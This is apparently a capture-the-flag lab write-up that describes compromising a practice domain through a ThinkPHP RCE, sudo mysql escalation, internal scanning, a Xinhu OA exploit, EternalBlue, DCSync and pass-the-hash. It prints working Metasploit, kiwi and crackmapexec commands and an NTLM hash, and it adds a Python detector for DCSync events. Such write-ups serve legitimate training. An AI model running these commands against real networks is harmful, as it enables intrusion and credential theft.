So expensive.

Scanned directories first and found a robots.txt, but there was nothing useful in it.

Then scanned ports.

This turned up a ThinkPHP 5.0.23 RCE; a one-click tool got a shell straight away.

Connected with AntSword and found we were www-data; sudo -l showed the mysql command could be run with sudo without a password, so a one-liner from GTFOBins was used to escalate privileges.

Got flag01.

Uploaded fscan via AntSword to scan the internal network; the results are below:

172.22.1.15:80 open
172.22.1.15:22 open
172.22.1.18:3306 open
172.22.1.21:445 open
172.22.1.18:445 open
172.22.1.2:445 open
172.22.1.21:139 open
172.22.1.18:139 open
172.22.1.2:139 open
172.22.1.21:135 open
172.22.1.18:135 open
172.22.1.2:135 open
172.22.1.18:80 open
172.22.1.2:88 open
[*] NetInfo:
[*]172.22.1.21
   [->]XIAORANG-WIN7
   [->]172.22.1.21
[*] NetInfo:
[*]172.22.1.18
   [->]XIAORANG-OA01
   [->]172.22.1.18
[*] NetInfo:
[*]172.22.1.2
   [->]DC01
   [->]172.22.1.2
[+] 172.22.1.21 MS17-010    (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[*] 172.22.1.2  (Windows Server 2016 Datacenter 14393)
[*] WebTitle: http://172.22.1.15        code:200 len:5578   title:Bootstrap Material Admin
[*] NetBios: 172.22.1.2      [+]DC DC01.xiaorang.lab             Windows Server 2016 Datacenter 14393 
[*] NetBios: 172.22.1.18     XIAORANG-OA01.xiaorang.lab          Windows Server 2012 R2 Datacenter 9600 
[*] NetBios: 172.22.1.21     XIAORANG-WIN7.xiaorang.lab          Windows Server 2008 R2 Enterprise 7601 Service Pack 1 
[*] WebTitle: http://172.22.1.18        code:302 len:0      title:None 跳转url: http://172.22.1.18?m=login
[*] WebTitle: http://172.22.1.18?m=login code:200 len:4012   title:信呼协同办公系统
[+] http://172.22.1.15 poc-yaml-thinkphp5023-method-rce poc1

So 172.22.1.21 is vulnerable to MS17-010 and 172.22.1.18 runs Xinhu OA (信呼协同办公系统); those are presumably where the remaining two flags are.

Set up a global proxy with frp + Proxifier first, then connect to it directly.

The version is v2.2.8, which has a known authenticated (back-end) RCE --> https://blog.csdn.net/solitudi/article/details/118675321 ; log in first with the weak credentials admin:admin123.

Copied and tweaked the blog author's exploit to get a shell; it runs as SYSTEM again.

The flag is in C:\Users\Administrator\flag.

The MS17-010 box has no outbound access, so run msf through proxychains4 and hit it with EternalBlue.

p4 msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp_uuid
set RHOSTS 172.22.1.21
run

Next is the DCSync attack; not very familiar with it, so just followed the steps.

First dump the hashes of the domain users.

# in msf
load kiwi
kiwi_cmd "lsadump::dcsync /domain:xiaorang.lab /all /csv" exit
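As an added defender-side example that is not part of the original writeup: the replication that lsadump::dcsync performs is logged on the domain controller as Security event 4662 carrying the DS-Replication-Get-Changes control-access-right GUIDs, and the tell-tale sign is such a request coming from an account that is not a known DC. The event lines below are constructed (flattened to key=value form) and the account names are made up for the demo.

```python
import re

# Control-access-right GUIDs that a DCSync-style replication request carries in
# Event 4662 "Properties"; a non-DC principal using them is the tell-tale sign.
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Constructed sample: 4662/4624 events flattened to one "key=value" line each.
# Field names follow the Windows event schema; the values are made up.
SAMPLE_EVENTS = """\
EventID=4662 SubjectUserName=DC01$ SubjectDomainName=XIAORANG Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2};{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}
EventID=4662 SubjectUserName=XIAORANG-WIN7$ SubjectDomainName=XIAORANG Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2};{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}
EventID=4662 SubjectUserName=jdoe SubjectDomainName=XIAORANG Properties={bf967a86-0de6-11d0-a285-00aa003049e2}
EventID=4624 SubjectUserName=jdoe SubjectDomainName=XIAORANG LogonType=3
"""

def parse_event(line):
    """Split a flattened 'key=value key=value' event line into a dict."""
    return dict(re.findall(r"(\w+)=(\S+)", line))

def is_domain_controller(account, dc_accounts):
    """Machine accounts of known DCs (e.g. DC01$) legitimately replicate."""
    return account.upper() in {a.upper() for a in dc_accounts}

def detect_dcsync(log_text, dc_accounts):
    """Return (subject, [right names]) for every 4662 event in which an account
    that is not a known DC requested a directory-replication right."""
    hits = []
    for line in log_text.splitlines():
        ev = parse_event(line)
        if ev.get("EventID") != "4662":
            continue
        guids = re.findall(r"\{([0-9a-f-]{36})\}", ev.get("Properties", "").lower())
        rights = [REPLICATION_GUIDS[g] for g in guids if g in REPLICATION_GUIDS]
        subject = ev.get("SubjectUserName", "")
        if rights and not is_domain_controller(subject, dc_accounts):
            hits.append((subject, rights))
    return hits

if __name__ == "__main__":
    for subject, rights in detect_dcsync(SAMPLE_EVENTS, ["DC01$"]):
        print(f"possible DCSync by {subject}: {', '.join(rights)}")
```

In a real deployment the allow-list would be the DC computer accounts plus any sanctioned sync service accounts (e.g. Azure AD Connect), and a 4662 with these rights from anything else warrants an immediate look.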

Then pass the hash with crackmapexec.

p4 crackmapexec smb 172.22.1.2 -u administrator -H 10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x "whoami"
p4 crackmapexec smb 172.22.1.2 -u administrator -H 10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x "type C:\Users\Administrator\flag\flag03.txt"

Done.